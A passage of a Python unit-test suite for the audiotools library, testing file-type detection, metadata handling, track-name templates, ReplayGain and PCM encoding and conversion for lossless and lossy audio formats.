self.audio_class.from_pcm(valid.name, BLANK_PCM_Reader(1))
self.assertEqual(audiotools.file_type(open(valid.name, "rb")),
self.audio_class)
#several invalid files and ensure audiotools.file_type
#returns None
#(though it's *possible* os.urandom might generate a valid file
# by virtue of being random that's extremely unlikely in practice)
for i in xrange(256):
self.assertEqual(os.path.getsize(invalid.name), i)
self.assertEqual(
audiotools.file_type(open(invalid.name, "rb")),
None)
invalid.write(os.urandom(1))
invalid.flush()
finally:
valid.close()
invalid.close()
@FORMAT_AUDIOFILE
def test_bits_per_sample(self):
if (self.audio_class is audiotools.AudioFile):
return
temp = tempfile.NamedTemporaryFile(suffix=self.suffix)
try:
for bps in (8, 16, 24):
track = self.audio_class.from_pcm(temp.name, BLANK_PCM_Reader(
1, bits_per_sample=bps))
self.assertEqual(track.bits_per_sample(), bps)
track2 = audiotools.open(temp.name)
self.assertEqual(track2.bits_per_sample(), bps)
finally:
temp.close()
@FORMAT_AUDIOFILE_PLACEHOLDER
def test_channels(self):
self.assert_(False)
@FORMAT_AUDIOFILE_PLACEHOLDER
def test_channel_mask(self):
self.assert_(False)
@FORMAT_AUDIOFILE_PLACEHOLDER
def test_sample_rate(self):
self.assert_(False)
@FORMAT_AUDIOFILE_PLACEHOLDER
def test_lossless(self):
self.assert_(False)
@FORMAT_AUDIOFILE
def test_metadata(self):
import string
if (self.audio_class is audiotools.AudioFile):
return
dummy_metadata = audiotools.MetaData(**dict(
[(field, char) for (field, char) in
zip(audiotools.MetaData.FIELDS,
string.ascii_letters)
if field not in audiotools.MetaData.INTEGER_FIELDS] +
[(field, i + 1) for (i, field) in
enumerate(audiotools.MetaData.INTEGER_FIELDS)]))
temp = tempfile.NamedTemporaryFile(suffix=self.suffix)
try:
track = self.audio_class.from_pcm(temp.name,
BLANK_PCM_Reader(1))
track.set_metadata(dummy_metadata)
track = audiotools.open(temp.name)
metadata = track.get_metadata()
if (metadata is None):
return
#check that delete_metadata works
nonblank_metadata = audiotools.MetaData(
track_name=u"Track Name",
track_number=1,
track_total=2,
album_name=u"Album Name")
track.set_metadata(nonblank_metadata)
self.assertEqual(track.get_metadata(), nonblank_metadata)
track.delete_metadata()
metadata = track.get_metadata()
if (metadata is not None):
self.assertEqual(
metadata,
audiotools.MetaData())
track.set_metadata(nonblank_metadata)
self.assertEqual(track.get_metadata(), nonblank_metadata)
old_mode = os.stat(track.filename).st_mode
os.chmod(track.filename, 0400)
try:
#check IOError on set_metadata()
self.assertRaises(IOError,
track.set_metadata,
audiotools.MetaData(track_name=u"Foo"))
#check IOError on delete_metadata()
self.assertRaises(IOError,
track.delete_metadata)
finally:
os.chmod(track.filename, old_mode)
os.chmod(track.filename, 0)
try:
#check IOError on get_metadata()
self.assertRaises(IOError,
track.get_metadata)
finally:
os.chmod(track.filename, old_mode)
finally:
temp.close()
@FORMAT_AUDIOFILE
def test_length(self):
if (self.audio_class is audiotools.AudioFile):
return
temp = tempfile.NamedTemporaryFile(suffix=self.suffix)
try:
for seconds in [1, 2, 3, 4, 5, 10, 20, 60, 120]:
track = self.audio_class.from_pcm(temp.name,
BLANK_PCM_Reader(seconds))
self.assertEqual(int(track.seconds_length()), seconds)
finally:
temp.close()
@FORMAT_AUDIOFILE_PLACEHOLDER
def test_pcm(self):
self.assert_(False)
@FORMAT_AUDIOFILE_PLACEHOLDER
def test_convert(self):
self.assert_(False)
@FORMAT_AUDIOFILE
def test_convert_progress(self):
if (self.audio_class is audiotools.AudioFile):
return
temp = tempfile.NamedTemporaryFile(suffix=self.suffix)
try:
track = self.audio_class.from_pcm(temp.name,
BLANK_PCM_Reader(10))
if (track.lossless()):
self.assert_(audiotools.pcm_frame_cmp(
track.to_pcm(),
BLANK_PCM_Reader(10)) is None)
for audio_class in audiotools.AVAILABLE_TYPES:
outfile = tempfile.NamedTemporaryFile(
suffix="." + audio_class.SUFFIX)
log = Log()
try:
track2 = track.convert(outfile.name,
audio_class,
progress=log.update)
self.assert_(len(log.results) > 0,
"no logging converting %s to %s" %
(self.audio_class.NAME,
audio_class.NAME))
self.assert_(len(set([r[1] for r in log.results])) == 1)
for x, y in zip(log.results[1:], log.results):
self.assert_((x[0] - y[0]) >= 0)
if (track.lossless() and track2.lossless()):
self.assert_(audiotools.pcm_frame_cmp(
track.to_pcm(), track2.to_pcm()) is None,
"PCM mismatch converting %s to %s" % (
self.audio_class.NAME,
audio_class.NAME))
finally:
outfile.close()
finally:
temp.close()
@FORMAT_AUDIOFILE
def test_track_number(self):
if (self.audio_class is audiotools.AudioFile):
return
temp_dir = tempfile.mkdtemp()
try:
track = self.audio_class.from_pcm(
os.path.join(temp_dir, "abcde" + self.suffix),
BLANK_PCM_Reader(1))
if (track.get_metadata() is None):
self.assertEqual(track.track_number(), None)
track = self.audio_class.from_pcm(
os.path.join(temp_dir, "01 - abcde" + self.suffix),
BLANK_PCM_Reader(1))
self.assertEqual(track.track_number(), 1)
track = self.audio_class.from_pcm(
os.path.join(temp_dir, "202 - abcde" + self.suffix),
BLANK_PCM_Reader(1))
self.assertEqual(track.track_number(), 2)
track = self.audio_class.from_pcm(
os.path.join(temp_dir, "303 45 - abcde" + self.suffix),
BLANK_PCM_Reader(1))
self.assertEqual(track.track_number(), 3)
else:
self.audio_class.from_pcm(
os.path.join(temp_dir, "01 - abcde" + self.suffix),
BLANK_PCM_Reader(1))
self.audio_class.from_pcm(
os.path.join(temp_dir, "202 - abcde" + self.suffix),
BLANK_PCM_Reader(1))
self.audio_class.from_pcm(
os.path.join(temp_dir, "303 45 - abcde" + self.suffix),
BLANK_PCM_Reader(1))
track.set_metadata(audiotools.MetaData(track_number=2))
metadata = track.get_metadata()
if (metadata is not None):
self.assertEqual(track.track_number(), 2)
track = audiotools.open(
os.path.join(temp_dir, "202 - abcde" + self.suffix))
track.set_metadata(audiotools.MetaData(track_number=1))
self.assertEqual(track.get_metadata().track_number, 1)
track = audiotools.open(
os.path.join(temp_dir, "01 - abcde" + self.suffix))
track.set_metadata(audiotools.MetaData(track_number=3))
self.assertEqual(track.get_metadata().track_number, 3)
track = audiotools.open(
os.path.join(temp_dir, "abcde" + self.suffix))
track.set_metadata(audiotools.MetaData(track_number=4))
self.assertEqual(track.get_metadata().track_number, 4)
finally:
for f in os.listdir(temp_dir):
os.unlink(os.path.join(temp_dir, f))
os.rmdir(temp_dir)
@FORMAT_AUDIOFILE
def test_album_number(self):
if (self.audio_class is audiotools.AudioFile):
return
temp_dir = tempfile.mkdtemp()
try:
track = self.audio_class.from_pcm(
os.path.join(temp_dir, "abcde" + self.suffix),
BLANK_PCM_Reader(1))
if (track.get_metadata() is None):
self.assertEqual(track.album_number(), None)
track = self.audio_class.from_pcm(
os.path.join(temp_dir, "01 - abcde" + self.suffix),
BLANK_PCM_Reader(1))
self.assertEqual(track.album_number(), None)
track = self.audio_class.from_pcm(
os.path.join(temp_dir, "202 - abcde" + self.suffix),
BLANK_PCM_Reader(1))
if (track.get_metadata() is None):
self.assertEqual(track.album_number(), 2)
track = self.audio_class.from_pcm(
os.path.join(temp_dir, "303 45 - abcde" + self.suffix),
BLANK_PCM_Reader(1))
if (track.get_metadata() is None):
self.assertEqual(track.album_number(), 3)
else:
self.audio_class.from_pcm(
os.path.join(temp_dir, "01 - abcde" + self.suffix),
BLANK_PCM_Reader(1))
self.audio_class.from_pcm(
os.path.join(temp_dir, "202 - abcde" + self.suffix),
BLANK_PCM_Reader(1))
self.audio_class.from_pcm(
os.path.join(temp_dir, "303 45 - abcde" + self.suffix),
BLANK_PCM_Reader(1))
track.set_metadata(audiotools.MetaData(album_number=2))
metadata = track.get_metadata()
if (metadata is not None):
self.assertEqual(track.album_number(), 2)
track = audiotools.open(
os.path.join(temp_dir, "202 - abcde" + self.suffix))
track.set_metadata(audiotools.MetaData(album_number=1))
self.assertEqual(track.album_number(), 1)
track = audiotools.open(
os.path.join(temp_dir, "01 - abcde" + self.suffix))
track.set_metadata(audiotools.MetaData(album_number=3))
self.assertEqual(track.album_number(), 3)
track = audiotools.open(
os.path.join(temp_dir, "abcde" + self.suffix))
track.set_metadata(audiotools.MetaData(album_number=4))
self.assertEqual(track.album_number(), 4)
finally:
for f in os.listdir(temp_dir):
os.unlink(os.path.join(temp_dir, f))
os.rmdir(temp_dir)
@FORMAT_AUDIOFILE
def test_track_name(self):
if (self.audio_class is audiotools.AudioFile):
return
format_template = u"Fo\u00f3 %%(%(field)s)s"
#first, test the many unicode string fields
for field in audiotools.MetaData.FIELDS:
if (field not in audiotools.MetaData.INTEGER_FIELDS):
metadata = audiotools.MetaData()
value = u"\u00dcnicode value \u2ec1"
setattr(metadata, field, value)
format_string = format_template % {u"field":
field.decode('ascii')}
track_name = self.audio_class.track_name(
file_path="track",
track_metadata=metadata,
format=format_string.encode('utf-8'))
self.assert_(len(track_name) > 0)
self.assertEqual(
track_name,
(format_template % {u"field": u"foo"} % \
{u"foo": value}).encode(audiotools.FS_ENCODING))
#then, check integer fields
format_template = (u"Fo\u00f3 %(album_number)d " +
u"%(track_number)2.2d %(album_track_number)s")
#first, check integers pulled from track metadata
for (track_number, album_number, album_track_number) in [
(0, 0, u"00"),
(1, 0, u"01"),
(25, 0, u"25"),
(0, 1, u"100"),
(1, 1, u"101"),
(25, 1, u"125"),
(0, 36, u"3600"),
(1, 36, u"3601"),
(25, 36, u"3625")]:
for basepath in ["track",
"/foo/bar/track",
(u"/f\u00f3o/bar/tr\u00e1ck").encode(
audiotools.FS_ENCODING)]:
metadata = audiotools.MetaData(track_number=track_number,
album_number=album_number)
self.assertEqual(self.audio_class.track_name(
file_path=basepath,
track_metadata=metadata,
format=format_template.encode('utf-8')),
(format_template % {
u"album_number": album_number,
u"track_number": track_number,
u"album_track_number": album_track_number}
).encode('utf-8'))
#then, check integers pulled from the track filename
for metadata in [None, audiotools.MetaData()]:
for basepath in ["track",
"/foo/bar/track",
(u"/f\u00f3o/bar/tr\u00e1ck").encode(
audiotools.FS_ENCODING)]:
if (metadata is None):
album_number = 0
track_number = 1
album_track_number = u"01"
else:
album_number = 0
track_number = 0
album_track_number = u"00"
self.assertEqual(self.audio_class.track_name(
file_path=basepath + "01",
track_metadata=metadata,
format=format_template.encode('utf-8')),
(format_template %
{u"album_number": album_number,
u"track_number": track_number,
u"album_track_number": album_track_number}
).encode('utf-8'))
if (metadata is None):
album_number = 0
track_number = 23
album_track_number = u"23"
else:
album_number = 0
track_number = 0
album_track_number = u"00"
self.assertEqual(self.audio_class.track_name(
file_path=basepath + "track23",
track_metadata=metadata,
format=format_template.encode('utf-8')),
(format_template %
{u"album_number": album_number,
u"track_number": track_number,
u"album_track_number": album_track_number}
).encode('utf-8'))
if (metadata is None):
album_number = 1
track_number = 23
album_track_number = u"123"
else:
album_number = 0
track_number = 0
album_track_number = u"00"
self.assertEqual(self.audio_class.track_name(
file_path=basepath + "track123",
track_metadata=metadata,
format=format_template.encode('utf-8')),
(format_template %
{u"album_number": album_number,
u"track_number": track_number,
u"album_track_number": album_track_number}
).encode('utf-8'))
if (metadata is None):
album_number = 45
track_number = 67
album_track_number = u"4567"
else:
album_number = 0
track_number = 0
album_track_number = u"00"
self.assertEqual(self.audio_class.track_name(
file_path=basepath + "4567",
track_metadata=metadata,
format=format_template.encode('utf-8')),
(format_template %
{u"album_number": album_number,
u"track_number": track_number,
u"album_track_number": album_track_number}
).encode('utf-8'))
#then, ensure metadata takes precedence over filename for integers
for (track_number, album_number,
album_track_number, incorrect) in [(1, 0, u"01", "10"),
(25, 0, u"25", "52"),
(1, 1, u"101", "210"),
(25, 1, u"125", "214"),
(1, 36, u"3601", "4710"),
(25, 36, u"3625", "4714")]:
for basepath in ["track",
"/foo/bar/track",
(u"/f\u00f3o/bar/tr\u00e1ck").encode(
audiotools.FS_ENCODING)]:
metadata = audiotools.MetaData(track_number=track_number,
album_number=album_number)
self.assertEqual(self.audio_class.track_name(
file_path=basepath + incorrect,
track_metadata=metadata,
format=format_template.encode('utf-8')),
(format_template %
{u"album_number": album_number,
u"track_number": track_number,
u"album_track_number": album_track_number}
).encode('utf-8'))
#also, check track_total/album_total from metadata
format_template = u"Fo\u00f3 %(track_total)d %(album_total)d"
for track_total in [0, 1, 25, 99]:
for album_total in [0, 1, 25, 99]:
metadata = audiotools.MetaData(track_total=track_total,
album_total=album_total)
self.assertEqual(self.audio_class.track_name(
file_path=basepath + incorrect,
track_metadata=metadata,
format=format_template.encode('utf-8')),
(format_template %
{u"track_total": track_total,
u"album_total": album_total}
).encode('utf-8'))
#ensure %(basename)s is set properly
format_template = u"Fo\u00f3 %(basename)s"
for (path, base) in [("track", "track"),
("/foo/bar/track", "track"),
((u"/f\u00f3o/bar/tr\u00e1ck").encode(
audiotools.FS_ENCODING), u"tr\u00e1ck")]:
for metadata in [None, audiotools.MetaData()]:
self.assertEqual(self.audio_class.track_name(
file_path=path,
track_metadata=metadata,
format=format_template.encode('utf-8')),
(format_template %
{u"basename": base}).encode('utf-8'))
#ensure %(suffix)s is set properly
format_template = u"Fo\u00f3 %(suffix)s"
for path in ["track",
"/foo/bar/track",
(u"/f\u00f3o/bar/tr\u00e1ck").encode(
audiotools.FS_ENCODING)]:
for metadata in [None, audiotools.MetaData()]:
self.assertEqual(self.audio_class.track_name(
file_path=path,
track_metadata=metadata,
format=format_template.encode('utf-8')),
(format_template %
{u"suffix":
self.audio_class.SUFFIX.decode(
'ascii')}).encode('utf-8'))
for metadata in [None, audiotools.MetaData()]:
#unsupported template fields raise UnsupportedTracknameField
self.assertRaises(audiotools.UnsupportedTracknameField,
self.audio_class.track_name,
"", metadata,
"%(foo)s")
#broken template fields raise InvalidFilenameFormat
self.assertRaises(audiotools.InvalidFilenameFormat,
self.audio_class.track_name,
"", metadata, "%")
self.assertRaises(audiotools.InvalidFilenameFormat,
self.audio_class.track_name,
"", metadata, "%{")
self.assertRaises(audiotools.InvalidFilenameFormat,
self.audio_class.track_name,
"", metadata, "%[")
self.assertRaises(audiotools.InvalidFilenameFormat,
self.audio_class.track_name,
"", metadata, "%(")
self.assertRaises(audiotools.InvalidFilenameFormat,
self.audio_class.track_name,
"", metadata, "%(track_name")
self.assertRaises(audiotools.InvalidFilenameFormat,
self.audio_class.track_name,
"", metadata, "%(track_name)")
@FORMAT_AUDIOFILE
def test_replay_gain(self):
if (self.audio_class.supports_replay_gain() and
self.audio_class.lossless_replay_gain()):
track_data1 = test_streams.Sine16_Stereo(44100, 44100,
441.0, 0.50,
4410.0, 0.49, 1.0)
track_data2 = test_streams.Sine16_Stereo(66150, 44100,
8820.0, 0.70,
4410.0, 0.29, 1.0)
track_data3 = test_streams.Sine16_Stereo(52920, 44100,
441.0, 0.50,
441.0, 0.49, 0.5)
track_file1 = tempfile.NamedTemporaryFile(
suffix="." + self.audio_class.SUFFIX)
track_file2 = tempfile.NamedTemporaryFile(
suffix="." + self.audio_class.SUFFIX)
track_file3 = tempfile.NamedTemporaryFile(
suffix="." + self.audio_class.SUFFIX)
try:
track1 = self.audio_class.from_pcm(track_file1.name,
track_data1)
track2 = self.audio_class.from_pcm(track_file2.name,
track_data2)
track3 = self.audio_class.from_pcm(track_file3.name,
track_data3)
self.assert_(track1.replay_gain() is None)
self.assert_(track2.replay_gain() is None)
self.assert_(track3.replay_gain() is None)
self.audio_class.add_replay_gain([track_file1.name,
track_file2.name,
track_file3.name])
self.assert_(track1.replay_gain() is not None)
self.assert_(track2.replay_gain() is not None)
self.assert_(track3.replay_gain() is not None)
gains = audiotools.replaygain.ReplayGain(44100)
track_data1.reset()
track_gain1 = track1.replay_gain()
(track_gain, track_peak) = gains.title_gain(track_data1)
self.assertEqual(round(track_gain1.track_gain, 4),
round(track_gain, 4))
self.assertEqual(round(track_gain1.track_peak, 4),
round(track_peak, 4))
track_data2.reset()
track_gain2 = track2.replay_gain()
(track_gain, track_peak) = gains.title_gain(track_data2)
self.assertEqual(round(track_gain2.track_gain, 4),
round(track_gain, 4))
self.assertEqual(round(track_gain2.track_peak, 4),
round(track_peak, 4))
track_data3.reset()
track_gain3 = track3.replay_gain()
(track_gain, track_peak) = gains.title_gain(track_data3)
self.assertEqual(round(track_gain3.track_gain, 4),
round(track_gain, 4))
self.assertEqual(round(track_gain3.track_peak, 4),
round(track_peak, 4))
album_gains = [round(t.replay_gain().album_gain, 4) for t in
[track1, track2, track3]]
self.assertEqual(len(set(album_gains)), 1)
album_peaks = [round(t.replay_gain().album_peak, 4) for t in
[track1, track2, track3]]
self.assertEqual(len(set(album_peaks)), 1)
(album_gain, album_peak) = gains.album_gain()
self.assertEqual(album_gains[0], round(album_gain, 4))
self.assertEqual(album_peaks[0], round(album_peak, 4))
#FIXME - check that add_replay_gain raises
#an exception when files are unreadable
#FIXME - check that add_replay_gain raises
#an exception when files are unwritable
#FIXME - check that add_replay_gain raises
#an exception when reading files produces an error
finally:
track_file1.close()
track_file2.close()
track_file3.close()
@FORMAT_AUDIOFILE
def test_read_after_eof(self):
if (self.audio_class is audiotools.AudioFile):
return None
#build basic file
temp_file = tempfile.NamedTemporaryFile(
suffix="." + self.audio_class.SUFFIX)
try:
#build a generic file of silence
temp_track = self.audio_class.from_pcm(
temp_file.name,
EXACT_SILENCE_PCM_Reader(44100))
#read all the PCM frames from the file
pcmreader = temp_track.to_pcm()
f = pcmreader.read(4000)
while (len(f) > 0):
f = pcmreader.read(4000)
self.assertEqual(len(f), 0)
#then ensure subsequent reads return blank FrameList objects
#without triggering an error
for i in xrange(10):
f = pcmreader.read(4000)
self.assertEqual(len(f), 0)
pcmreader.close()
self.assertRaises(ValueError,
pcmreader.read,
4000)
finally:
temp_file.close()
@FORMAT_AUDIOFILE
def test_invalid_from_pcm(self):
if (self.audio_class is audiotools.AudioFile):
return
#test our ERROR_PCM_Reader works
self.assertRaises(ValueError,
ERROR_PCM_Reader(ValueError("error"),
failure_chance=1.0).read,
1)
self.assertRaises(IOError,
ERROR_PCM_Reader(IOError("error"),
failure_chance=1.0).read,
1)
#ensure that our dummy file doesn't exist
dummy_filename = "invalid." + self.audio_class.SUFFIX
self.assert_(not os.path.isfile(dummy_filename))
#a decoder that raises IOError on to_pcm()
#should trigger an EncodingError
self.assertRaises(audiotools.EncodingError,
self.audio_class.from_pcm,
dummy_filename,
ERROR_PCM_Reader(IOError("I/O Error")))
#and ensure invalid files aren't left lying around
self.assert_(not os.path.isfile(dummy_filename))
#a decoder that raises ValueError on to_pcm()
#should trigger an EncodingError
self.assertRaises(audiotools.EncodingError,
self.audio_class.from_pcm,
dummy_filename,
ERROR_PCM_Reader(ValueError("Value Error")))
#and ensure invalid files aren't left lying around
self.assert_(not os.path.isfile(dummy_filename))
#FIXME
@FORMAT_AUDIOFILE_PLACEHOLDER
def test_cuesheet(self):
self.assert_(False)
#FIXME
@FORMAT_AUDIOFILE_PLACEHOLDER
def test_verify(self):
self.assert_(False)
class LosslessFileTest(AudioFileTest):
@FORMAT_LOSSLESS
def test_lossless(self):
if (self.audio_class is audiotools.AudioFile):
return
temp = tempfile.NamedTemporaryFile(suffix=self.suffix)
try:
track = self.audio_class.from_pcm(temp.name, BLANK_PCM_Reader(1))
self.assertEqual(track.lossless(), True)
track = audiotools.open(temp.name)
self.assertEqual(track.lossless(), True)
finally:
temp.close()
@FORMAT_LOSSLESS
def test_channels(self):
if (self.audio_class is audiotools.AudioFile):
return
temp = tempfile.NamedTemporaryFile(suffix=self.suffix)
try:
for channels in [1, 2, 3, 4, 5, 6]:
track = self.audio_class.from_pcm(temp.name, BLANK_PCM_Reader(
1, channels=channels, channel_mask=0))
self.assertEqual(track.channels(), channels)
track = audiotools.open(temp.name)
self.assertEqual(track.channels(), channels)
finally:
temp.close()
@FORMAT_LOSSLESS
def test_channel_mask(self):
if (self.audio_class is audiotools.AudioFile):
return
temp = tempfile.NamedTemporaryFile(suffix=self.suffix)
try:
for mask in [["front_center"],
["front_left",
"front_right"],
["front_left",
"front_right",
"front_center"],
["front_left",
"front_right",
"back_left",
"back_right"],
["front_left",
"front_right",
"front_center",
"back_left",
"back_right"],
["front_left",
"front_right",
"front_center",
"low_frequency",
"back_left",
"back_right"]]:
cm = audiotools.ChannelMask.from_fields(**dict(
[(f, True) for f in mask]))
track = self.audio_class.from_pcm(temp.name, BLANK_PCM_Reader(
1, channels=len(cm), channel_mask=int(cm)))
self.assertEqual(track.channels(), len(cm))
if (int(track.channel_mask()) != 0):
self.assertEqual(track.channel_mask(), cm)
track = audiotools.open(temp.name)
self.assertEqual(track.channels(), len(cm))
self.assertEqual(track.channel_mask(), cm)
finally:
temp.close()
@FORMAT_LOSSLESS
def test_sample_rate(self):
if (self.audio_class is audiotools.AudioFile):
return
temp = tempfile.NamedTemporaryFile(suffix=self.suffix)
try:
for rate in [8000, 16000, 22050, 44100, 48000,
96000, 192000]:
track = self.audio_class.from_pcm(temp.name, BLANK_PCM_Reader(
1, sample_rate=rate))
self.assertEqual(track.sample_rate(), rate)
track = audiotools.open(temp.name)
self.assertEqual(track.sample_rate(), rate)
finally:
temp.close()
@FORMAT_LOSSLESS
def test_pcm(self):
if (self.audio_class is audiotools.AudioFile):
return
temp = tempfile.NamedTemporaryFile(suffix=self.suffix)
temp2 = tempfile.NamedTemporaryFile()
temp_dir = tempfile.mkdtemp()
try:
for compression in (None,) + self.audio_class.COMPRESSION_MODES:
#test silence
reader = MD5_Reader(BLANK_PCM_Reader(1))
if (compression is None):
track = self.audio_class.from_pcm(temp.name, reader)
else:
track = self.audio_class.from_pcm(temp.name, reader,
compression)
checksum = md5()
audiotools.transfer_framelist_data(track.to_pcm(),
checksum.update)
self.assertEqual(reader.hexdigest(), checksum.hexdigest())
#test random noise
reader = MD5_Reader(RANDOM_PCM_Reader(1))
if (compression is None):
track = self.audio_class.from_pcm(temp.name, reader)
else:
track = self.audio_class.from_pcm(temp.name, reader,
compression)
checksum = md5()
audiotools.transfer_framelist_data(track.to_pcm(),
checksum.update)
self.assertEqual(reader.hexdigest(), checksum.hexdigest())
#test randomly-sized chunks of silence
reader = MD5_Reader(Variable_Reader(BLANK_PCM_Reader(10)))
if (compression is None):
track = self.audio_class.from_pcm(temp.name, reader)
else:
track = self.audio_class.from_pcm(temp.name, reader,
compression)
checksum = md5()
audiotools.transfer_framelist_data(track.to_pcm(),
checksum.update)
self.assertEqual(reader.hexdigest(), checksum.hexdigest())
#test randomly-sized chunks of random noise
reader = MD5_Reader(Variable_Reader(RANDOM_PCM_Reader(10)))
if (compression is None):
track = self.audio_class.from_pcm(temp.name, reader)
else:
track = self.audio_class.from_pcm(temp.name, reader,
compression)
checksum = md5()
audiotools.transfer_framelist_data(track.to_pcm(),
checksum.update)
self.assertEqual(reader.hexdigest(), checksum.hexdigest())
#test PCMReaders that trigger a DecodingError
self.assertRaises(ValueError,
ERROR_PCM_Reader(ValueError("error"),
failure_chance=1.0).read,
1)
self.assertRaises(IOError,
ERROR_PCM_Reader(IOError("error"),
failure_chance=1.0).read,
1)
self.assertRaises(audiotools.EncodingError,
self.audio_class.from_pcm,
os.path.join(temp_dir,
"invalid" + self.suffix),
ERROR_PCM_Reader(IOError("I/O Error")))
self.assertEqual(os.path.isfile(
os.path.join(temp_dir,
"invalid" + self.suffix)),
False)
self.assertRaises(audiotools.EncodingError,
self.audio_class.from_pcm,
os.path.join(temp_dir,
"invalid" + self.suffix),
ERROR_PCM_Reader(IOError("I/O Error")))
self.assertEqual(os.path.isfile(
os.path.join(temp_dir,
"invalid" + self.suffix)),
False)
#test unwritable output file
self.assertRaises(audiotools.EncodingError,
self.audio_class.from_pcm,
"/dev/null/foo.%s" % (self.suffix),
BLANK_PCM_Reader(1))
#test without suffix
reader = MD5_Reader(BLANK_PCM_Reader(1))
if (compression is None):
track = self.audio_class.from_pcm(temp2.name, reader)
else:
track = self.audio_class.from_pcm(temp2.name, reader,
compression)
checksum = md5()
audiotools.transfer_framelist_data(track.to_pcm(),
checksum.update)
self.assertEqual(reader.hexdigest(), checksum.hexdigest())
finally:
temp.close()
temp2.close()
for f in os.listdir(temp_dir):
os.unlink(os.path.join(temp_dir, f))
os.rmdir(temp_dir)
@FORMAT_LOSSLESS
def test_convert(self):
if (self.audio_class is audiotools.AudioFile):
return
#check various round-trip options
temp = tempfile.NamedTemporaryFile(suffix=self.suffix)
try:
track = self.audio_class.from_pcm(
temp.name,
test_streams.Sine16_Stereo(441000, 44100,
8820.0, 0.70, 4410.0, 0.29, 1.0))
for audio_class in audiotools.AVAILABLE_TYPES:
temp2 = tempfile.NamedTemporaryFile(
suffix="." + audio_class.SUFFIX)
try:
track2 = track.convert(temp2.name,
audio_class)
if (track2.lossless()):
self.assert_(
audiotools.pcm_frame_cmp(track.to_pcm(),
track2.to_pcm()) is None,
"error round-tripping %s to %s" % \
(self.audio_class.NAME,
audio_class.NAME))
else:
pcm = track2.to_pcm()
counter = FrameCounter(pcm.channels,
pcm.bits_per_sample,
pcm.sample_rate)
audiotools.transfer_framelist_data(pcm,
counter.update)
self.assertEqual(
int(counter), 10,
"mismatch encoding %s (%s/%d != %s)" % \
(audio_class.NAME,
counter,
int(counter),
10))
self.assertRaises(audiotools.EncodingError,
track.convert,
"/dev/null/foo.%s" % \
(audio_class.SUFFIX),
audio_class)
for compression in audio_class.COMPRESSION_MODES:
track2 = track.convert(temp2.name,
audio_class,
compression)
if (track2.lossless()):
self.assert_(
audiotools.pcm_frame_cmp(
track.to_pcm(), track2.to_pcm()) is None,
"error round-tripping %s to %s at %s" % \
(self.audio_class.NAME,
audio_class.NAME,
compression))
else:
pcm = track2.to_pcm()
counter = FrameCounter(pcm.channels,
pcm.bits_per_sample,
pcm.sample_rate)
audiotools.transfer_framelist_data(track2.to_pcm(),
counter.update)
self.assertEqual(
int(counter), 10,
("mismatch encoding %s " +
"at quality %s (%s != %s)") % \
(audio_class.NAME, compression,
counter, 10))
#check some obvious failures
self.assertRaises(audiotools.EncodingError,
track.convert,
"/dev/null/foo.%s" % \
(audio_class.SUFFIX),
audio_class,
compression)
finally:
temp2.close()
finally:
temp.close()
class LossyFileTest(AudioFileTest):
@FORMAT_LOSSY
def test_bits_per_sample(self):
if (self.audio_class is audiotools.AudioFile):
return
temp = tempfile.NamedTemporaryFile(suffix=self.suffix)
try:
for bps in (8, 16, 24):
track = self.audio_class.from_pcm(temp.name, BLANK_PCM_Reader(
1, bits_per_sample=bps))
self.assertEqual(track.bits_per_sample(), 16)
track2 = audiotools.open(temp.name)
self.assertEqual(track2.bits_per_sample(), 16)
finally:
temp.close()
@FORMAT_LOSSY
def test_lossless(self):
if (self.audio_class is audiotools.AudioFile):
return
temp = tempfile.NamedTemporaryFile(suffix=self.suffix)
try:
track = self.audio_class.from_pcm(temp.name, BLANK_PCM_Reader(1))
self.assertEqual(track.lossless(), False)
track = audiotools.open(temp.name)
self.assertEqual(track.lossless(), False)
finally:
temp.close()
@FORMAT_LOSSY
def test_channels(self):
if (self.audio_class is audiotools.AudioFile):
return
temp = tempfile.NamedTemporaryFile(suffix=self.suffix)
try:
for channels in [1, 2, 3, 4, 5, 6]:
track = self.audio_class.from_pcm(temp.name, BLANK_PCM_Reader(
1, channels=channels, channel_mask=0))
self.assertEqual(track.channels(), 2)
track = audiotools.open(temp.name)
self.assertEqual(track.channels(), 2)
finally:
temp.close()
@FORMAT_LOSSY
def test_channel_mask(self):
if (self.audio_class is audiotools.AudioFile):
return
temp = tempfile.NamedTemporaryFile(suffix=self.suffix)
try:
cm = audiotools.ChannelMask.from_fields(
front_left=True,
front_right=True)
track = self.audio_class.from_pcm(temp.name, BLANK_PCM_Reader(
1, channels=len(cm), channel_mask=int(cm)))
self.assertEqual(track.channels(), len(cm))
self.assertEqual(track.channel_mask(), cm)
track = audiotools.open(temp.name)
self.assertEqual(track.channels(), len(cm))
self.assertEqual(track.channel_mask(), cm)
finally:
temp.close()
@FORMAT_LOSSY
def test_pcm(self):
if (self.audio_class is audiotools.AudioFile):
return
temp = tempfile.NamedTemporaryFile(suffix=self.suffix)
temp2 = tempfile.NamedTemporaryFile()
temp_dir = tempfile.mkdtemp()
try:
for compression in (None,) + self.audio_class.COMPRESSION_MODES:
#test silence
reader = BLANK_PCM_Reader(5)
if (compression is None):
track = self.audio_class.from_pcm(temp.name, reader)
else:
track = self.audio_class.from_pcm(temp.name, reader,
compression)
counter = FrameCounter(2, 16, 44100)
audiotools.transfer_framelist_data(track.to_pcm(),
counter.update)
self.assertEqual(int(counter), 5,
"mismatch encoding %s at quality %s" % \
(self.audio_class.NAME,
compression))
#test random noise
reader = RANDOM_PCM_Reader(5)
if (compression is None):
track = self.audio_class.from_pcm(temp.name, reader)
else:
track = self.audio_class.from_pcm(temp.name, reader,
compression)
counter = FrameCounter(2, 16, 44100)
audiotools.transfer_framelist_data(track.to_pcm(),
counter.update)
self.assertEqual(int(counter), 5,
"mismatch encoding %s at quality %s" % \
(self.audio_class.NAME,
compression))
#test randomly-sized chunks of silence
reader = Variable_Reader(BLANK_PCM_Reader(5))
if (compression is None):
track = self.audio_class.from_pcm(temp.name, reader)
else:
track = self.audio_class.from_pcm(temp.name, reader,
compression)
counter = FrameCounter(2, 16, 44100)
audiotools.transfer_framelist_data(track.to_pcm(),
counter.update)
self.assertEqual(int(counter), 5,
"mismatch encoding %s at quality %s" % \
(self.audio_class.NAME,
compression))
#test randomly-sized chunks of random noise
reader = Variable_Reader(RANDOM_PCM_Reader(5))
if (compression is None):
track = self.audio_class.from_pcm(temp.name, reader)
else:
track = self.audio_class.from_pcm(temp.name, reader,
compression)
counter = FrameCounter(2, 16, 44100)
audiotools.transfer_framelist_data(track.to_pcm(),
counter.update)
self.assertEqual(int(counter), 5,
"mismatch encoding %s at quality %s" % \
(self.audio_class.NAME,
compression))
#test PCMReaders that trigger a DecodingError
